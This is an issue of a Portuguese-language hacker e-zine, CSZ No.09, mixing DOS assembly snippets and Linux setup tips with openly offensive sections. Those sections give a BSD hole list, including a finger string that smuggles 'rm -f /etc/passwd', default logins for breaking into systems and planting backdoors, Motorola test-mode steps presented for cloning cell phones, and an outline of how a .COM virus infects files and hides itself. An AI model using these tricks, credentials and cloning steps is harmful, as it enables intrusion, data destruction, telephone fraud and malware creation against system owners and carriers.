CCCCCCCC SSSSSSSS ZZZZZZZZ CC SS ZZ CC SS ZZ CC SSSSSSSS ZZ CC SS ZZ CC SS ZZ CCCCCCCC SSSSSSSS ZZZZZZZZ CSZ - Cheat Struck Zine by Cheat Struck No.09 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ Indice $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Seção: Matéria: Assunto: Autor: Nota: 1. Introdução CSZ No.09 Cheat Struck --- 2. Programação Int's e fontes para ASM Cheat Struck 9,0 3. Bugz Lista de bugz no BSD Cheat Struck 7,5 4. Hacking para iniciantes Dicas para LINUX Cheat Struck 8,5 5. Phreaking Telefonia Celular Cheat Struck 9,5 6. Invasão de privacidade Invadindo sistemas BSD Cheat Struck 9,0 7. VIRII Passos do virus Cheat Struck 10,0 8. Crackerz Modificando COMMAND.COM Cheat Struck 9,5 9. Hack, the Art Backdoor's simples Cheat Struck 9,5 10. Preview $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 1. Introdução $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Hellow DooD'z!!! Estou com muitos trabalos aki para fazer por isso não garanto a mes- ma agilidade e rapidez na entrega dos zines. Para quem ainda não sabe este zine é entregado por mim mesmo e alguns parceiros meus no IRCserver via-rs. Estou com dificuldades na elaboração da minha page. Por isso por em- quanto o zine é distribuido apenas via DCCsend nos IRCroom's #hackers e #senhas. Talvés ainda saia o #CSCHANNEL, mas não é certo. Outra coisa: estou trabalhando em 2 tutoriais, CSM-CSManual definido de hacking, e HACK the Book. Ambos ensinam as melhores técnicas de hacking detalhadamente. O HACK the Book é tipo uma coletanea das melhores matérias q eu já encontrei na inet. O outro eu estou detalhando as técnicas já usadas por mim na hora de hackear. Modestia parte, estão muito bons. Este numero do zine está bem bom tb, inclusive com um tutorial que eu mesmo escrevi, mostrando os primeiros passos de um virus. E lah no finzinho do zine você vai encontrar um BONUS especial com uma lista TOP10 onde você verá os melhores materiais de hacking que vc pode encontrar na inet. Hahh!! Eu ouvi muito babaca na IRC dizendo que eu apenas copiei maté- ria dos outros zines mais importantes como Axur05, Hack and Phreak, Nethack, etc... Pois eu quero que todos saibam que eu não estou copiando matéria de zine algum. Se apareceu lah alguma coisa que tá parecida com o que você en- controu aki é pura coinsidencia, pois aki no Underworld as coisas que publi- camos as vezes saem parecidas. Tipo: Agora mesmo eu estava lendo a H n' P 03 e ví que lah no zine deles(que a meu respeito é um dos melhores) eles inaugu- raram uma seção chamada VIRII, é igual a minha. Isso é apenas uma coinsiden- cia, pois eu jah fazia esta seção desda edição numero 1. E eu não acho que eles devem ter me copiado por que eu conheço um pouco do pessoal que escreve o zine e acho que nem leram o meu ainda. Mas e' só pra cambada de lamer ficar sabendo que eu não vou abrir mão do zine pq 1 ou 2 coisas ficaram parecidas com a dos outros. E NÃO ME ENCHAM MAIS O SACO!!!!!!!!!! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 2. Programação $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ É,eu sei que prometi um tutorial de assembly para essa seção. Mas... eu to sem o menor saco para escreve-lo. Chegei a começar, acabei na metade da lista das funções das interrupções. Mas o que vcs tem que saber é que EU NÃO ACABEI O TUTORIAL E NÃO VOU PUBLICA-LO INCOMPLETO!!! Porém vou colocar aki nessa seção, as interrupções mais usadas e suas funções, e tb ums fontes bem simples, para vcs irem estu- dando. -----teclado(int 16h)---- mov ah, 00h ; lê um caracter do teclado int 16h ; (Teclado) mov ah, 01h ; lê estado atual do teclado int 16h ; (Teclado) -----video(int 10h)----- mov ah, 02h ; seleciona a posição do cursor mov BH, XXh ; XX = pagina de video mov DH, XXh ; XX = linha mov DL, XXh ; XX = coluna int 10h ; (video) mov ah, 09h ; exibe um caracter na posição do cursor mov AL, XXh ; XX = caracter a exibir mov BH, XXh ; XX = pagina de video mov BL, XXh ; XX = atributo do caracter mov CX, XXh ; XX = Numero de repetições int 10h ; (video) mov ah, 0Ah ; exibe um caracter na posissão do cursor mov AL, XXh ; XX = Caracter a exibir mov BH, XXh ; XX = Pagina de video mov BL, XXh ; XX = Cor do caracter mov CX, XXh ; XX = Numero de repetições int 10h ; (video) mov ah, 6Ah ; 800x600 int 10h ; (video) mov ah, 07h ; 80x25 int 10h ; (video) -----MS-DOS (int 21h)----- mov ah, 01h ; entrada do teclado int 21h ; (dos) mov ah, 02h ; imprimir um caractere mov DL, XXh ; XX = Valor a ser mostrado. int 21h ; (dos) MOV AH, 09h ; imprimir cadeia de caracteres MOV DX, XXh ; XX = inicio da cadeia MOV CX, XXh ; XX = Qts vezes será mostrada int 21h ; (dos) mov ah, 3Ch ; Criação de file mov CX, XXh ; XX = 00(Normal), 02(Oculto), 04(System), 06 ; (Oculto e System) int 21h ; (dos) mov al, 4Ch ; sai para o dos int 21h ; (dos) ------impressora(int 17h)----- mov ah, 00h ; imprime um valor ascii mov AL, XXh ; XX = caracter a imprimir mov DX, XXXXh ; XXXX = porta de conexão int 17h ; (impressora) mov ah, 01h ; seta uma porta paralela da impressora mov DX, XXXXh ; XXXX = porta int 17h ; (impressora) mov ah, 02h ; lê estado da impressora mov DX, XXXXh ; XXXX = porta int 17h ; (impressora) portas: lpt1=0 lpt2=1 e assim por diante... FONTE DE PROGRAMAS PARA DEBUG ------modelo1.COM------------------------------------------------------------ mov al, 6A ; al = 64 int 10 ; função 64(800x600) no video mov al, 4C ; al = 4c int 21 ; função 4c(sai pro dos) no dos ----------------------------------------------------------------------------- ------modelo2.com------------------------------------------------------------ MOV AX,0006 ; AX = 0006 MOV BX,0004 ; BX = 0004 ADD AX,BX ; 0006(AX) + 0004(BX) = A INT 20 ; Finaliza o Programa ----------------------------------------------------------------------------- ------modelo3.com------------------------------------------------------------ - a100 jmp 125 ;Salta para o endereço 125h [Enter] - e 102 'Hello, How are you ?' 0d 0a '$' - a125 MOV DX,0102 ; DX = string MOV CX,000F ; string será mostrada F(15) vezes. MOV AH,09 ; função 09 INT 21 ; (dos) DEC CX ; 000F(CX) - 1 = 000E JCXZ 0134 ; Se CX = 0 salta para o endereço 0134 JMP 012D ; Salta ao endereço 012D INT 20 ; Finaliza o programa ----------------------------------------------------------------------------- ------modelo4.com------------------------------------------------------------ MOV AH,01 ;Função para mudar o cursor MOV CX,0007 ;Formata o cursor INT 10 ;Chama interrupção do BIOS(video) INT 20 ;Finaliza o programa ----------------------------------------------------------------------------- ------modelo5.com------------------------------------------------------------ MOV AH,01 ;Função 1 (lê caractere do teclado) INT 21 ;Chama interrupção do DOS CMP AL,0D ;Compara se o caractere lido é um ENTER JNZ 0100 ;Se não é, lê um outro caractere MOV AH,02 ;Função 2 (escreve um caractere na tela) MOV DL,AL ;Character to write on AL INT 21 ;Chama interrupção do DOS INT 20 ;Finaliza o programa ----------------------------------------------------------------------------- FONTES DE PROGs PARA TASM E TLINK ------one.asm---------------------------------------------------------------- ;nome do programa: one.asm ; .model small .stack .code mov AH,1h ;Função 1 do DOS Int 21h ;lê o caracter e retórna o código ASCII ao registrador AL mov DL,AL ;move o código ASCII para o registrador DL sub DL,30h ;subtrai de 30h para converter a um digito de 0 a 9 cmp DL,9h ;compara se o digito est entre 0 e 9 jle digit1 ;se verdadeiro obtém o primeiro número (4 bits) sub DL,7h ;se falso, subtrai de 7h para converter a uma letra A-F digit1: mov CL,4h ;prepara para multiplicar por 16 shl DL,CL ;multiplica para converter dentro dos 4 bits mais altos int 21h ;obtém o próximo caracter sub AL,30h ;repete a operação de conversão cmp AL,9h ;compara o valor 9h com o conte£do do registrador AL jle digit2 ;se verdadeiro, obtém o segundo digito sub AL,7h ;se falso, subtrai de 7h digit2: add DL,AL ;adiciona o segundo digito mov AH,4Ch ;funçãoo 4Ch do DOS (exit) Int 21h ;interrupção 21h End ;finaliza o programa ----------------------------------------------------------------------------- Ok. Vamos ficar por aki. Todos os programas aki foram testados e es- critos por mim, então não me venha com essa de não funciona. Vou ficar devendo alguns progs para TASM por que eu ainda tenho que escrever as outras seções. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$ 3. Bugz $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ BSD é um bug vivo! Não tem uma versão dele que não venha bugzada por isso estou colocando essa matéria aki pra vcs encontrarem os bugz. Versão: Bug(descrição): BSD 4.1 mail directly to a file () BSD 4.1 exec sgid program, dump core, core is sgid () BSD 4.1 lock -- compiled in password "hasta la vista" () BSD <4.2 IFS w/ preserve bug w/vi () BSD <4.2 suspend mkdir, ln file you want to dir () BSD 4.2 lock -- compiled in password "hasta la vista" () BSD 4.2 ln passwd file to mail spool, mail to user file () BSD 4.2 can truncate read only files () BSD 4.2 finger "string|/bin/rm -f /etc/passwd"@foo.bar () BSD 4.2 ln -s target ~/.plan; finger user to read file () BSD 4.2 lpr file; rm file; ln -s /any/filename file () BSD 4.2 adb su; change check in memory; shell out () BSD 4.2 race condition, can get root via "at" () BSD 4.3 ftp -n; quote user ftp; cd ~root, get root priv () BSD 4.3 lpd can overwrite file () BSD 4.3 ln -s /any/suid/file -i ; -i Get suid shell () BSD 4.3 fchown (2) can chown _any_ file () BSD 4.3 race condition (expreserve?), root via "at" () BSD 4.3 passwd chokes on long lines, splits pw file () Atenção!!! Estes bugz foram retirados da Holelist de 93 por isso pode estar meio desatualizada. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 4. Hacking para iniciantes $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Chega de enrolação!!! Já estamos na edição numero 09 e se você ainda naum instalou o seu UNIX, bem... Não me venha dizer que não sabia que você devia instala-lo, pois desde a edição numero 0(zero) eu estou dizendo para vc ir conseguindo o LINUX com algum amigo ou compra (quer molesa come merda que não tem osso). Apartir de agora tudo o que eu ensinar aqui será dirigido aos usuários de UNIX(tanto faz se é LINUX, SunOS, AIX). Isso porque você tem que aprender que nunca será um hacker se não usar um S.O. bom na sua conexão. Aí se diz: "Mas eu não quero ser hacker". Então porque está lendo ese zine?? Para aranjar informações sobre o assunto, Apenas?? Bem mas de qualquer forma eu recomendo que você instale o seu unix. Aki vai uma série de dicas que serão extremamente úteis na hora de usar o seu UNIX. ==================1. Como eu Acesso um disquete no LINUX ??================== Vá para o diretório /dev, de um ls e vc verá varios dispositiveis do seu computador. Entre eles está o fd0 que corresponde ao seu drive de disqte. Então use o comando mount para montar esse dispositivo em um diretório. Como? Bem, o comando deve estar nessa sintaxe: # mount /dev/fd0 /diretório Onde diretório é o diretório onde quer que o disquete seja montado. Atenção! O diretório especificado tem que existir. =================2. Como eu acesso a internet com o LINUX ??================= Antes de mais nada crie um script chamado connect. Para isso digite: echo pppd /dev/modem 115200 >> /bin/connect chmod a+x /bin/connect Pronto?? Não... O linux tem um progaminha, chamado minicom, que seve para acessar a redes. Antes de roda-lo você precissa ver se o seu modem já está linkado. Pra isso vá ao dir /dev e digite "ls modem". Se não aparecer o link modem faça o seginte: 1. Veja em que porta o seu modem está conectado. Se não souber fazer isso vá para o inferno. 2. As portas COM no linux são mostradas assim: cua0 = COM1 cua1 = COM2 cua2 = COM3 cua3 = COM4 3. Então agora digite: ln /dev/(porta) /dev/modem Bem agora que você linkou a porta do seu modem digite minicom para entrar no programa. Tecle Ctrl+A depois largue e aperte Z para entrar no menu de ajuda. Tecle O para entrar nas configurações. Configure direitinho o seu modem, depois volte a tela principal do minicom. Aki vai uma pequena lista de comandos para o modem que você usará no prog para se conectar. at e0 = não mostra o que vc está digitando. at e1 = vêr o que vc está digitando. at l# = volume. Onde # é a intensidade. at s7=## = Tempo que o modem esperará até que o outro de sinal. Onde ## é o tempo em segundos. at s0=0 = O modem não responderá a nenhuma ligação. at s0=1 = O modem responderá a todas as ligações. at dp####### = Discagem por pulse. Onde ####### é o numero do phone. at dt####### = Discagem por tone. Onde ####### é o numeor do phone. Já entendeu né? Não? então ai vai os comandos: atdp No.-do-seu-provedor (digite o login) (digite a senha) (digite ppp se pedir o tipo de conexão) (tecle Ctrl+A depois solte e tecle Z) (tecle Q para sair do programa) # connect (lembra daquele script que vc fez??) Agora sim. Se tudo deu certo, você está online. Dá próxima vez que quizer se conectar é só entrar no minicom e seguir os passos acima(apartir do atdp No.-do-seu-servidor). ====================3. Tá e agora?? Que programas eu uso??=================== Para navegar via ftp use o ftp. Para WWW use o lynx. Para mandar e-mails use o sendmail. E para Chats use o bitchx. Esse talvéz não venha acompanhado com o linux mas você pode consegui-lo no http://www.sasknet.com/~pionh/index.htm. >>>»»»4. Gravei uns txts no WINDOWS. Não tem como visualisa-los no UNIX?««<<< Sim. Para isso você deve mountar a unidade do windows em um diretório do LINUX. As unidades de Hard Disk são: hda1 = 1o HD(Normalmente o do Windows) hda2 = 2o HD(normalmente a partição pro Linux) hda3 = 3o HD(normalmente o segundo hd ou outra partição) e assim por diante, dependendo de quantas HD's vc tem ou quantas partições vc fez... Então digite: # mount /dev/hda1 /diretório Isso claro se o seu Win estiver no primeiro HD. Onde o /diretório é o diretório onde vc irá montar o 1o HD. =========5. Como faço para estabelecer uma conexão ppp com um amigo??======== Primeiro faça uma conta para ele. Digite: # adduser login Onde login é o login dele. Depois indique a senha. Agora fale com ele e diga o seu login e senha e diz pra ele usar o minicom para ligar pra você. Entre no programa minicom e digite: at s0=1 Isso fará com que o modem responda a ligaçào do seu amigo. Agora ele digitará o login e a senha que vc indicou e ping. Para vêr se ele está conectado, saia do prog minicom e digite who, se o login dele aparecer é que ele está conectado a sua maquina. Aki vão alguns comandos para facilitar o seu contato com seu amigo. who = mostra quem está online w = idem finger $$$ = mostra info sobre o $$$(login do user). write $$$ = Abre chat com $$$(login do user). sz = Envia via Zmodem rz = Recebe via Zmodem sx = Envia via Xmodem rx = Recebe via Xmodem sb = Envia via Ymodem rb = Recebe via Ymodem umodem = Envia/Recebe via Umodem $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 5. Phreaking $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Vamos acabar lógo com essa lista de comandos para a programação(que já está ocupando edições de mais). aki vão 5 comandos. Depois desses faltam ainda 18 e pronto! A lista inteira e o melhor: Em PORTUGUÊS!!! --------Lista de comandos para TESTMODE em celulares Motorola (parte5)------- 51# Teste de movel onde converte os dados que são transmitidos e mostra de volta. Exibe da seguinte maneira: PASS = dados corretos FAIL1= dados não transmitidos, espere mais 2 segundos FAIL2= dados incorretos 52*# Ajustamento fase SAT. Aki estão os valores que pode assumir. Não entre com nenhum valor que não esteja na lista abaixo. 0 degrees = 0 121.5 degrees = 59 243.0 degrees = 86 4.5 = 1 126.0 = 60 247.5 = 87 9.0 = 2 130.5 = 61 252.0 = 112 13.5 = 3 135.0 = 62 256.5 = 113 18.0 = 4 139.5 = 63 261.0 = 114 22.5 = 5 144.0 = 40 265.5 = 115 27.0 = 6 148.5 = 41 270.0 = 116 31.5 = 7 153.0 = 42 274.5 = 117 36.0 = 16 157.5 = 43 279.0 = 118 40.5 = 17 162.0 = 44 283.5 = 119 45.0 = 18 166.5 = 45 288.0 = 120 49.5 = 19 171.0 = 46 292.5 = 121 54.0 = 20 175.5 = 47 297.0 = 122 58.5 = 21 180.0 = 64 301.5 = 123 63.0 = 22 184.5 = 65 306.0 = 124 67.5 = 23 189.0 = 66 310.5 = 125 72.0 = 48 193.5 = 67 315.0 = 126 76.5 = 49 198.0 = 68 319.5 = 127 81.0 = 50 202.5 = 69 324.0 = 104 85.5 = 51 207.0 = 70 328.5 = 105 90.0 = 52 211.5 = 71 333.0 = 106 94.5 = 53 216.0 = 80 337.5 = 107 99.0 = 54 220.5 = 81 342.0 = 108 103.5 = 55 225.0 = 82 346.5 = 109 108.0 = 56 229.5 = 83 351.0 = 110 112.5 = 57 234.0 = 84 355.5 = 111 117.0 = 58 238.5 = 85 360.0 = 70 53# habilita a opção scrambler. 54# Disabilita a opção scrambler. 55# Mostra/Programa o N.A.M. (Programação no Test Mode). Atenção! Isso é muito, MUITO importante para a clonagem de celulares. Lêia com atenção. O texto retirado da biblia dos celulares motorola ficará meio confuso se eu não esclarecer esses detalhes antes: NAM(Number Assigment Module) é um componente onde ficam armazenados o ESN(Electronic Serial Number), MIN(Numero do telefone), SCM(Station Class Mark), lock code(codigo do aparelho) etc... Ele é totalmente programavel, porém em alguns aparelhos(mais antigos) é precisso de um certo sofhware espe- cial para programa-los, em outros casos(como esse) ele pode ser programado pelo próprio teclado numerico do celular. O ESM é a "indentidade" do celular, é burlando o ESM que nós conse- guiremos clonar o celular. _____PROGRAMAÇÃO DO NAM_____ Para entrar digite 55# no TEST MODE. Aki está as teclas que vc usará. TECLA: FUNÇÃO: ^^^^^^ ^^^^^^^ * Avansa para o próximo passo. NOTA: No modo de programação não aparece o numero do passo. CLR Volta um passo atrás. # Sai do modo de programação. _____PROGRAMAÇÃO DE DADOS em Celulares AMPS e NAMPS_____ Vejamos as coisas mais importantes apenas. PASSO 01 (System ID) Entrada de 00000 - 32767 PASSO 02 (Opção de programação) Entrada de 8 digitos binarios. Sugiro entrar com: 11101001 para o sistema "A" 10101001 para o sistema "B". 1 Digito: Local. Deixe como 1. 2 Digito: Sistema (1 para o sistema A e 0 pro B). 3 Digito: DTMF (1 para habilitar). Deixe como 1. 4 Digito: Teste móvel. Não use (coloque 0). 5 Digito: Chamada Repertória (1 para habilitar). Coloque 1. 6 Digito: Alerta Auxiliar (1 para habilitar). Coloque 0 7 Digito: Auto mute (1 para habilitar). Fica mudo sempre que você aperta alguma tecla. Coloque 0 8 Digito: Marca MIN (1 para habilitar). Coloque 1 PASSO 03 (MIM) Entrada de 10 digitos: DDD-TLPHONE PASSO 04 (Station Class Mark) Entrada de 2 digitos SCM | Ch. 666 ou 832 | VOX | Força Max -----+----------------+-----+----------- 00 | 666 | N | 3.0 W 01 | 666 | N | 1.2 W 02 | 666 | N | 0.6 W 03 | | | 04 | 666 | Y | 3.0 W 05 | 666 | Y | 1.2 W 06 | 666 | Y | 0.6 W 07 | | | 08 | 832 | N | 3.0 W 09 | 832 | N | 1.2 W 10 | 832 | N | 0.6 W 11 | | | 12 | 832 | Y | 3.0 W 13 | 832 | Y | 1.2 W 14 | 832 | Y | 0.6 W 15 | | | PASSO 07 (LOCK CODE) Entrada de 3 digitos. Para verificar o seu fora do test mode tecle: FCN + 0 + SECURITY CODE + RCL PASSO 09 (Nível do Serviço) Entrada de 3 digitos. Aqui estão os códigos: 001 Fraco - O telefone não aceitará entradas pelo teclado. 002 Fraquissima - O telefone não aceitará entradas pelo teclado e disativa- rá a super velocidade na discagem. 003 Médio - O teclado só servirá para discar. 004 Padrão - Discagens pelo teclado e pela memoria ilimitadas. 005 Médio - Discagem para apenas 7 digitos. 006 Bom - Todo o teclado e memoria, mas apenas 1 locação de memoria. 007 Bom - O phone irá discar apenas para as 50 programações da memoria. PASSO 10 (Opção de programação) Entrada de 8 digitos binarios. Sugiro entrar com: 00000100 1 - 3 Digito : Não é usado no Brasil nem nos EUA, entre com 0. 4 Digito: Scaneia mais de 32 paginas de canais. 0 disabilita. 5 Digito: Sistema de scaneamento sinples (1 para habilitar). 6 Digito: Chamada Super veloz (1 para habilitar). 7 Digito: Serviço do nível do usuário (0 para habilitar) 8 Digito: Função de trancar (0 para habilitar) PASSO 11 (Opção de programação) Entrada de 8 digitos binarios. Sugiro que entre com: 00000000 1 Digito: Handset speaker interno (0 para habilitar). 2 Digito: Segundo numero do phone (1 para habilitar). 3 Digito: Chama o tempo de acesso (0 para habilitar). 4 Digito: Auto Rediscagem (0 para habilitar). 5 Digito: Speaker Interno (1 para habilitar). 6 Digito: IMTS/Cellular (1 para habilitar, é raro) 7 Digito: Sistema de Registro do usuário (0 para habilitar). 8 Digito: Antena Dupla (1 para habilitar). Não tem em todos. PASSO 12 (Página inicial do canal) Entrada de : 0333 0334 PASSO 16 (Opção de Programação) Entrada de 8 digitos binarios. sugiro que entre com: 00110010 para portateis 00110011 para unidades móveis 1 Digito: Enhanced Scan (1=habilita, 0=desabilita). 2 Digito: Conexão do Celular (0=seriesII, 1=seriesI, 0 em todos os phones TDMA). 3 Digito: DTMF continuo (1 para habilitar). 4 Digito: Ringer/Speaker transportavél, 0=Transducer, 1=Handset. 5 Digito: 8 horas fora do modo transportavel, 0 para habilitar. 6 Digito: Não é usada, coloque apenas 0. 7 Digito: Idicador de falha na página (0 para habilitar). 8 Digito: Scaneador Portatíl (0 para portatíl, 1 para unid móveis). OS passos 01 à 06 e 12 serão repetidos pelo NAM se o segundo possuir o segundo numero do phone (PASSO 11, 2o. digito). _____PROGRAMAÇÃO DE DADOS em Celulares TDMA_____ São praticamente os mesmos passos: AMPS/NAMPS TDMA ^^^^^^^^^^ ^^^^ PASSO 01 = PASSO 01 PASSO 02 = PASSO 02 PASSO 03 = PASSO 03 PASSO 04 = PASSO 04 PASSO 07 = PASSO 08 PASSO 09 = PASSO 09 PASSO 10 = PASSO 10 PASSO 11 = PASSO 11 PASSO 12 = PASSO 12 PASSO 16 = PASS0 19 --------Fim da parte 5------------------------------------------------------- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$ 6. Invasão de Privacidade $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Para entrar em sistemas alheios você pode contar muitas vezes com o login test. Ele fica ativo porque em muitas ocasioes o administrador está querendo fazer apenas um teste com o seu sistema. Essa conta tem um UID e GID altos o bastante para editar o arquivo /etc/passwd e fazer backdoor's ou pegar as contas para descripta-las. A conta é: Login : test Senha : test Outras contas que as vezes tb ficam expostas são: Login : games Senha : games Login : user Senha : user Login : guest Senha : guest Após testa-las, e não funcionar tente comandar o login e conseguir o Login dos usuários conectados. Mas, como se comanda o login??? Quando você encontrar o pedido de lo- gin para o sistema tente esses comandos: rwho finger who Eles mostrarão os logins dos users on-line. Muitas vezes o usuário usa a mesma senha como login. Essas "falhas" eu encontrei nos sistemas BSD, que são na certa os mais bugzados encontrados na rede(Mais que AIX). Talvéz tb funcionem em sistemas SunOS's. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 7. VIRII $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Bem... Nós jah sabemos os tipos de virus existentes, sabemos o que são trojans, sabemos o que são virus, e sabemos programar em ASSEMBLY(a lin- guagem mais usada para fazer virus). Então, o que estamos esperando??? Vamos começar o aprendizado à "Criação de Virus". ----------Manual-de-Criação-de-Virus-by-Cheat-Struck------------------------- Não Vamos erolar muito e vamos direto ao que enteressa. Veremos nessa primeira parte do tutorial, os 3 primeiros passos que o virus deve seguir: A hospedagem, a infectação e encobrir a infectação. [[[[[ HOSPEDAGEM ]]]]] Vejamos o nosso esquema: 1. .---------. .-----------. | Arquivo | | Virus | '---------' '-----------' Aqui nos temos o Arquivo que será infectado(um .COM) e o virus. 2. .---------. .----+----. | Arquivo | = | P1 | P2 | '---------' '----+----' .-----------. .----+------. | Virus | = | V1 | V2 | '-----------' '----+------' Dividimos o Arquivo a ser infectado em 2 partes(P1 e P2). E fazemos o mesmo com o Virus. Note que na divisão o P1 é igual ao V1, porém o P2 não precissa ser igual ao V2. 3. .----+----+----. .---------. | P1 | P2 | P1 | = | Arquivo | '----+----+----' '---------' Copiamos a Parte1(P1) do arquivo para o seu final. 4. .----+----+----. .---------. | V1 | P2 | P1 | = | Arquivo | '----+----+----' '---------' Copiamos a parte 1(V1) do virus para o inicio do arquivo, em cima da Parte 1(P1) Original do arquivo. 5. .----+----+----+------. .-------------------. | V1 | P2 | P1 | V2 | = | Arquivo infectado | '----+----+----+------' '-------------------' Finalmente copiamos a segunda parte(V2) do virus para o final do ar- quivo. Pronto! O arquivo foi infectado. Note que o Arquivo infectado é maior do que o arquivo inicial(limpo). A primeira parte(V1) do virus, nada mais faz do que chamar a segunda parte(V2) dele, onde está toda a função. Essa seria uma "Entrada" quase sem erros e bem detalhada. Porém o tipo de hospedagem mais usado é: .---------+---------. | Virus | Arquivo | '---------+---------' Copiamos o Virus para o inicio do Arquivo, então quando for executa- do o arquivo, o virus será executado antes. [[[[[ INFECTAÇÃO ]]]]] Okz, O víruz está hospedado. Agora o que ele tem que fazer é infectar outros arquivos. Para isso ele deve seguir estes passos: 1. Encontrar um arquivo para infectar; 2. Checar se ele já está infectado; 3. Se estiver, volta para o passo 1; 4. Infectar ele; 5. Se já infectou arquivos o suficiente, sai; 6. Se não volta pro passo 1. [[[[[ ENCOBRINDO A INFECTAÇÃO ]]]]] Quando for infectar o arquivo tenha certeza de que os dados(tipo data /hora, atributo, ...) tenham sido recuperados. Para que isso seja feito os passos que o virus deve seguir são estes: 1. Salve os atributos e mude-os para nada; 2. Salvar Data/Hora do arquivo; 3. Fechar o arquivo; 4. Abrir o arquivo em modo Read/Write; 5. Copie P1 para o fim do arquivo; 6. Copie V1 no lugar do P1 original; 7. Copie V2 para o final do arquivo; 8. Restaure os atributos e data/hora do arquivo. ----------Fim-da-parte-1----------------------------------------------------- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 8. Crackerz $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Vamos aprender a mexer no nosso COMMAND.COM ??? Vamos!!!!! Isso não é D+?? Tá, tá! Chega de emosão. Nós utilizaremos o programa debug para isso. Primeiro, para não me encherem o saco se fizerem besteira, vamos co- piar o command.com para qquer outro dir (Nem para a raiz nem pro \WINDOWS) . Siga os meus passos: C:\> md teste C:\> copy command.com \teste C:\> cd \teste C:\TESTE\> dir /b command.com C:\TESTE\> Agora vamos rodar o debugar ele: C:\TESTE\> debug command.com Bem. A primeira coisa que faremos será modificar o comando copy. Para isso, antes teremos que achar o comando copy no COMMAND.COM(Clarou). Digite: -s 100 ffff "COPY" Note que "COPY" deve ser escrito em maiusculas. Após isso aparecerão algumas linhas como: 2486:cab1 2486:cc63 Essas são as linhas onde se encontram a palavra COPY. Agora digite: -d cab1 Isso demonstrará o conteudo da linha 2486:cab1, se for umas coisas tipo: COPY.PAUSE.DATE.TIME.VER.VOL... ; isso é o coração do MSDOS. Se o seu MSDOS não for versão 4.00 as linhas exibidas poderam ser ou- tras. Aí é só digitar d + a segunda parte(depois dos ":" ) da linha exibida no comando s 100 ffff "COPY" e ver se encontra as linhas exibidas acima. Ex: -s 100 ffff "COPY" 1D74:8ED7 1D74:B11B 1D74:D8DB -d 8ed7 1D74:8ED7 43 4F 50 59 05 50 41-55 53 45 04 44 41 54 45 COPY.PAUSE.DATE .... Tá bom... Vamos mudar o nome do comando COPY para TEST. Sigua este ex levando em conta que a palavra "COPY" está em 2486:cab1. -d cab1 2486:CAB1 43 4F 50 59 05 50 41-55 53 45 04 44 41 54 45 COPY.PAUSE.DATE .... { Note o nome: ^^^^ } -e cab1 2486:CAB1 43. { Aki digite 54(equivale a letra T)} - -d cab1 2486:CAB1 54 4F 50 59 05 50 41-55 53 45 04 44 41 54 45 TOPY.PAUSE.DATE .... { Note que COPY mudou para: ^^^^ } -e cab2 {cab2 equivale a segunda letra} 2486:CAB2 4F. { Aki digite 45(equivale a letra E)} 